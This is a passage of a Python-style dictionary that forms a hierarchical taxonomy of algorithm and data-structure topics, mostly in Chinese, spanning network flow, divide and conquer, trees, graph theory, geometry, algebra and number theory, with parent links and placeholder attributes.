'name': '网络流线性规划',
'appearance': None,
'parent': 15,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
17: {
'name': '上下界网络流',
'appearance': None,
'parent': 16,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
18: {
'name': '最小割',
'appearance': None,
'parent': 16,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
19: {
'name': '费用流',
'appearance': None,
'parent': 16,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
20: {
'name': 'Edmond-Karp',
'appearance': None,
'parent': 15,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
21: {
'name': 'Capacity Scaling',
'appearance': None,
'parent': 20,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
22: {
'name': 'Dinic&SAP',
'appearance': None,
'parent': 20,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
23: {
'name': 'HLPP',
'appearance': None,
'parent': 20,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
24: {
'name': '差分约束',
'appearance': None,
'parent': 1,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
25: {
'name': '通用线性规划',
'appearance': None,
'parent': 1,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
26: {
'name': '单纯形算法',
'appearance': None,
'parent': 25,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
27: {
'name': '分数规划',
'appearance': None,
'parent': 1,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
28: {
'name': '贪心',
'appearance': None,
'parent': 1,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
29: {
'name': '分治',
'appearance': None,
'parent': 1,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
30: {
'name': '序列分治',
'appearance': None,
'parent': 29,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
31: {
'name': 'CDQ&整体二分&线段树分治',
'appearance': None,
'parent': 30,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
32: {
'name': '快速排序',
'appearance': None,
'parent': 30,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
33: {
'name': '快速选择',
'appearance': None,
'parent': 32,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
34: {
'name': 'Median of Medians',
'appearance': None,
'parent': 33,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
35: {
'name': '树分治',
'appearance': None,
'parent': 29,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
36: {
'name': '点/边分治',
'appearance': None,
'parent': 35,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
37: {
'name': '重链剖分',
'appearance': None,
'parent': 35,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
38: {
'name': '树上启发式合并',
'appearance': None,
'parent': 37,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
39: {
'name': '长链剖分',
'appearance': None,
'parent': 37,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
40: {
'name': '搜索',
'appearance': None,
'parent': 1,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
41: {
'name': 'DFS',
'appearance': None,
'parent': 40,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
42: {
'name': 'BFS',
'appearance': None,
'parent': 40,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
43: {
'name': '搜索优化与剪枝',
'appearance': None,
'parent': 40,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
44: {
'name': 'A*',
'appearance': None,
'parent': 43,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
45: {
'name': '迭代加深搜索',
'appearance': None,
'parent': 43,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
46: {
'name': '折半搜索',
'appearance': None,
'parent': 40,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
47: {
'name': '随机化及近似',
'appearance': None,
'parent': 1,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
48: {
'name': '爬山',
'appearance': None,
'parent': 47,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
49: {
'name': '模拟退火',
'appearance': None,
'parent': 47,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
50: {
'name': '遗传算法',
'appearance': None,
'parent': 47,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
51: {
'name': '机器学习基础',
'appearance': None,
'parent': 47,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
52: {
'name': '离线逆序',
'appearance': None,
'parent': 1,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
53: {
'name': '莫队算法',
'appearance': None,
'parent': 52,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
54: {
'name': '散列',
'appearance': None,
'parent': 1,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
55: {
'name': '数据结构',
'appearance': None,
'parent': 0,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
56: {
'name': '栈',
'appearance': None,
'parent': 55,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
57: {
'name': '队列',
'appearance': None,
'parent': 55,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
58: {
'name': '散列表',
'appearance': None,
'parent': 55,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
59: {
'name': '堆',
'appearance': None,
'parent': 55,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
60: {
'name': '二叉堆',
'appearance': None,
'parent': 59,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
61: {
'name': '可并堆',
'appearance': None,
'parent': 59,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
62: {
'name': '二叉查找树',
'appearance': None,
'parent': 55,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
63: {
'name': '堆树',
'appearance': None,
'parent': 62,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
64: {
'name': '伸展树',
'appearance': None,
'parent': 62,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
65: {
'name': '红黑树',
'appearance': None,
'parent': 62,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
66: {
'name': '替罪羊树',
'appearance': None,
'parent': 62,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
67: {
'name': '树状数组',
'appearance': None,
'parent': 55,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
68: {
'name': '线段树',
'appearance': None,
'parent': 55,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
69: {
'name': '划分树与归并树',
'appearance': None,
'parent': 68,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
70: {
'name': '并查集',
'appearance': None,
'parent': 55,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
71: {
'name': '带权并查集',
'appearance': None,
'parent': 70,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
72: {
'name': '路径压缩',
'appearance': None,
'parent': 70,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
73: {
'name': '按秩合并',
'appearance': None,
'parent': 70,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
74: {
'name': 'Sparse Table',
'appearance': None,
'parent': 55,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
75: {
'name': 'K维树',
'appearance': None,
'parent': 55,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
76: {
'name': '动态树',
'appearance': None,
'parent': 55,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
77: {
'name': '点/边分治树',
'appearance': None,
'parent': 76,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
78: {
'name': 'Link-Cut Tree',
'appearance': None,
'parent': 76,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
79: {
'name': '欧拉回路树',
'appearance': None,
'parent': 76,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
80: {
'name': 'AAA Tree&TopTree',
'appearance': None,
'parent': 76,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
81: {
'name': '动态图',
'appearance': None,
'parent': 55,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
82: {
'name': '图论',
'appearance': None,
'parent': 0,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
83: {
'name': '最小生成树',
'appearance': None,
'parent': 82,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
84: {
'name': 'Prim算法',
'appearance': None,
'parent': 83,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
85: {
'name': 'Kruskal算法',
'appearance': None,
'parent': 83,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
86: {
'name': 'Boruvka算法',
'appearance': None,
'parent': 85,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
87: {
'name': '最小树形图',
'appearance': None,
'parent': 83,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
88: {
'name': '朱-刘算法',
'appearance': None,
'parent': 87,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
89: {
'name': '斯坦纳树',
'appearance': None,
'parent': 83,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
90: {
'name': '最短路径',
'appearance': None,
'parent': 82,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
91: {
'name': 'dijkstra算法',
'appearance': None,
'parent': 90,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
92: {
'name': 'Bellman-Ford算法',
'appearance': None,
'parent': 90,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
93: {
'name': 'Johnson算法',
'appearance': None,
'parent': 92,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
94: {
'name': 'Floyd算法',
'appearance': None,
'parent': 90,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
95: {
'name': '欧拉路&哈密顿路',
'appearance': None,
'parent': 82,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
96: {
'name': '连通性',
'appearance': None,
'parent': 82,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
97: {
'name': '点/边双连通分量',
'appearance': None,
'parent': 96,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
98: {
'name': '强连通性',
'appearance': None,
'parent': 96,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
99: {
'name': '支配树',
'appearance': None,
'parent': 96,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
100: {
'name': '匹配、划分与覆盖',
'appearance': None,
'parent': 82,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
101: {
'name': 'KM算法',
'appearance': None,
'parent': 100,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
102: {
'name': '交错树',
'appearance': None,
'parent': 101,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
103: {
'name': '带花树算法',
'appearance': None,
'parent': 101,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
104: {
'name': 'Tutte矩阵与一般图匹配',
'appearance': None,
'parent': 101,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
105: {
'name': '覆盖集与独立集',
'appearance': None,
'parent': 100,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
106: {
'name': '稳定婚姻问题与GS算法',
'appearance': None,
'parent': 100,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
107: {
'name': 'Hall定理',
'appearance': None,
'parent': 100,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
108: {
'name': 'DAG路径覆盖',
'appearance': None,
'parent': 100,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
109: {
'name': 'Dilworth定理',
'appearance': None,
'parent': 100,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
110: {
'name': '2-SAT',
'appearance': None,
'parent': 82,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
111: {
'name': '虚树',
'appearance': None,
'parent': 82,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
112: {
'name': '仙人掌',
'appearance': None,
'parent': 82,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
113: {
'name': '圆方树',
'appearance': None,
'parent': 112,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
114: {
'name': '弦图与区间图',
'appearance': None,
'parent': 82,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
115: {
'name': '图的树分解',
'appearance': None,
'parent': 82,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
116: {
'name': '最小割',
'appearance': None,
'parent': 82,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
117: {
'name': '最小割树',
'appearance': None,
'parent': 116,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
118: {
'name': 'Stoer-Wagner算法',
'appearance': None,
'parent': 116,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
119: {
'name': '平面图',
'appearance': None,
'parent': 82,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
120: {
'name': '平面图对偶图',
'appearance': None,
'parent': 119,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
121: {
'name': '网格图',
'appearance': None,
'parent': 82,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
122: {
'name': '计算几何',
'appearance': None,
'parent': 0,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
123: {
'name': '几何向量',
'appearance': None,
'parent': 122,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
124: {
'name': '二维凸包',
'appearance': None,
'parent': 122,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
125: {
'name': '凸包算法',
'appearance': None,
'parent': 124,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
126: {
'name': '卷包裹法',
'appearance': None,
'parent': 125,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
127: {
'name': '动态凸包',
'appearance': None,
'parent': 125,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
128: {
'name': '三维凸包',
'appearance': None,
'parent': 124,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
129: {
'name': '半平面交',
'appearance': None,
'parent': 124,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
130: {
'name': '旋转卡壳',
'appearance': None,
'parent': 122,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
131: {
'name': '三角剖分',
'appearance': None,
'parent': 122,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
132: {
'name': 'V图',
'appearance': None,
'parent': 131,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
133: {
'name': '路径规划',
'appearance': None,
'parent': 122,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
134: {
'name': '代数',
'appearance': None,
'parent': 0,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
135: {
'name': '微积分基础',
'appearance': None,
'parent': 134,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
136: {
'name': 'Simpson积分算法',
'appearance': None,
'parent': 135,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
137: {
'name': '线性代数',
'appearance': None,
'parent': 134,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
138: {
'name': '矩阵基础',
'appearance': None,
'parent': 137,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
139: {
'name': '高斯消元',
'appearance': None,
'parent': 138,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
140: {
'name': '拟阵',
'appearance': None,
'parent': 138,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
141: {
'name': 'Matrix-Tree定理',
'appearance': None,
'parent': 138,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
142: {
'name': '线性递推',
'appearance': None,
'parent': 138,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
143: {
'name': '多项式与幂级数',
'appearance': None,
'parent': 134,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
144: {
'name': 'DFT/FFT',
'appearance': None,
'parent': 143,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
145: {
'name': 'NTT',
'appearance': None,
'parent': 144,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
146: {
'name': 'Bluestein算法',
'appearance': None,
'parent': 144,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
147: {
'name': '多项式基本运算',
'appearance': None,
'parent': 143,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
148: {
'name': '多项式除法',
'appearance': None,
'parent': 147,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
149: {
'name': '多项式基本初等函数',
'appearance': None,
'parent': 147,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
150: {
'name': 'FWT',
'appearance': None,
'parent': 143,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
151: {
'name': '子集变换',
'appearance': None,
'parent': 150,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
152: {
'name': '抽象代数',
'appearance': None,
'parent': 134,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
153: {
'name': '置换群',
'appearance': None,
'parent': 152,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
154: {
'name': 'Schreier-Sims算法',
'appearance': None,
'parent': 153,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
155: {
'name': '数论',
'appearance': None,
'parent': 0,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
156: {
'name': '同余和整除',
'appearance': None,
'parent': 155,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
157: {
'name': '欧几里得算法',
'appearance': None,
'parent': 156,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
158: {
'name': '扩展欧几里得算法',
'appearance': None,
'parent': 157,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
159: {
'name': '类欧几里得算法',
'appearance': None,
'parent': 157,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
160: {
'name': '欧拉定理',
'appearance': None,
'parent': 156,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
161: {
'name': '二次剩余',
'appearance': None,
'parent': 156,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
162: {
'name': '原根及离散对数',
'appearance': None,
'parent': 156,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
163: {
'name': 'BSGS',
'appearance': None,
'parent': 162,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
164: {
'name': 'lucas定理',
'appearance': None,
'parent': 156,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
165: {
'name': '质数与简单数论函数',
'appearance': None,
'parent': 155,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
166: {
'name': '埃氏筛',
'appearance': None,
'parent': 165,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
167: {
'name': '欧拉筛',
'appearance': None,
'parent': 165,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
168: {
'name': '莫比乌斯反演',
'appearance': None,
'parent': 165,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
169: {
'name': '数论函数快速求和',
'appearance': None,
'parent': 165,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
170: {
'name': '杜教筛',
'appearance': None,
'parent': 169,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
171: {
'name': '洲阁筛',
'appearance': None,
'parent': 169,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
172: {
'name': '素性测试',
'appearance': None,
'parent': 165,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
173: {
'name': 'Miller-Robin',
'appearance': None,
'parent': 172,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
174: {
'name': 'Pollard\'s Rho 因子分解',
'appearance': None,
'parent': 172,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
175: {
'name': '组合计数',
'appearance': None,
'parent': 0,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
176: {
'name': '计数原理',
'appearance': None,
'parent': 175,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
'traits': {
'structure': 1,
'graphic': 1
}
}
,
177: {
'name': '容斥原理',
'appearance': None,
'parent': 176,
'relations': {},
'privilege': 0,
'difficulty': 0,
'level': 0,
